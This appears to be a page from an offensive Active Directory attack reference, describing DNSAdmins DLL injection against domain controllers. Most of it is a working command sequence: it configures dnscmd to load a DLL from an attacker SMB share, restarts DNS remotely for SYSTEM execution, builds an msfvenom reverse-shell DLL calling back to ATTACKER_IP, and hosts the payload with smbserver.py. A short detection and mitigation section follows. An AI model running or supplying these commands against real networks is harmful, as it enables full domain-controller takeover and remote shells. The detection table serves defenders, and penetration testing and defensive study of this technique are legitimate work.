attack-46-dnsadmins-dll-injection.md (3332B)
1 --- 2 title: "Attack #46 β DNSAdmins DLL Injection" 3 description: "Members of the DnsAdmins group can configure the DNS service to load an arbitrary DLL via the ServerLevelPluginDll registry key. Since the DNS serviceβ¦" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/π£ Attack #46 β DNSAdmins DLL Injection.md" 11 --- 12 # π£ Attack #46 β DNSAdmins DLL Injection 13 14 *** 15 16 ## π How It Works 17 18 Members of the **DnsAdmins** group can configure the DNS service to load an arbitrary DLL via the `ServerLevelPluginDll` registry key. Since the DNS service runs as **SYSTEM** on Domain Controllers, loading a malicious DLL grants SYSTEM-level code execution on the DC. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in DnsAdmins group** | Or equivalent permission to configure DNS | 27 | **DNS service on DC** | Standard β runs on DCs by default | 28 | **SMB share hosting DLL** | DLL must be accessible from DC | 29 30 *** 31 32 ## π» Full Commands 33 34 ```powershell 35 # ββ Check group membership ββββββββββββββββββββββββββββββββββββββββββββββββββββ 36 net user low_user /domain | findstr /i "dnsadmins" 37 38 # ββ Set malicious DLL plugin ββββββββββββββββββββββββββββββββββββββββββββββββββ 39 dnscmd DC01.corp.local /config /serverlevelplugindll \\ATTACKER\share\evil.dll 40 41 # ββ Restart DNS service (requires restart to load DLL) ββββββββββββββββββββββββ 42 sc \\DC01.corp.local stop dns 43 sc \\DC01.corp.local start dns 44 # DLL executes as SYSTEM on DC01 45 46 # ββ Cleanup β remove the plugin DLL config ββββββββββββββββββββββββββββββββββββ 47 dnscmd DC01.corp.local /config /serverlevelplugindll "" 48 ``` 49 50 ```bash 51 # ββ Generate reverse shell DLL ββββββββββββββββββββββββββββββββββββββββββββββββ 52 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \ 53 -f dll -o evil.dll 54 55 # ββ Host on SMB share βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 56 smbserver.py share /path/to/dll/ -smb2support 57 ``` 58 59 *** 60 61 ## π‘οΈ Detection β Event IDs 62 63 | Event ID | Source | What to Look For | 64 |---|---|---| 65 | **770** | DNS Server Log | DNS plugin DLL loaded | 66 | **7045** | System Log | DNS service restart | 67 | **4688** | Security Log | dnscmd.exe execution with ServerLevelPluginDll argument | 68 69 *** 70 71 ## π Attack Chain Context 72 73 ``` 74 [DNSAdmins] βββ DLL Injection β SYSTEM on DC 75 β 76 ββββ π DnsAdmins membership β SYSTEM on DC β DCSync 77 ββββ β οΈ Requires DNS service restart β may cause brief DNS outage 78 ββββ π Defeated by: audit DnsAdmins membership, monitor dnscmd usage 79 ``` 80 81 *** 82 83 > β **Attack #46 β DNSAdmins complete.**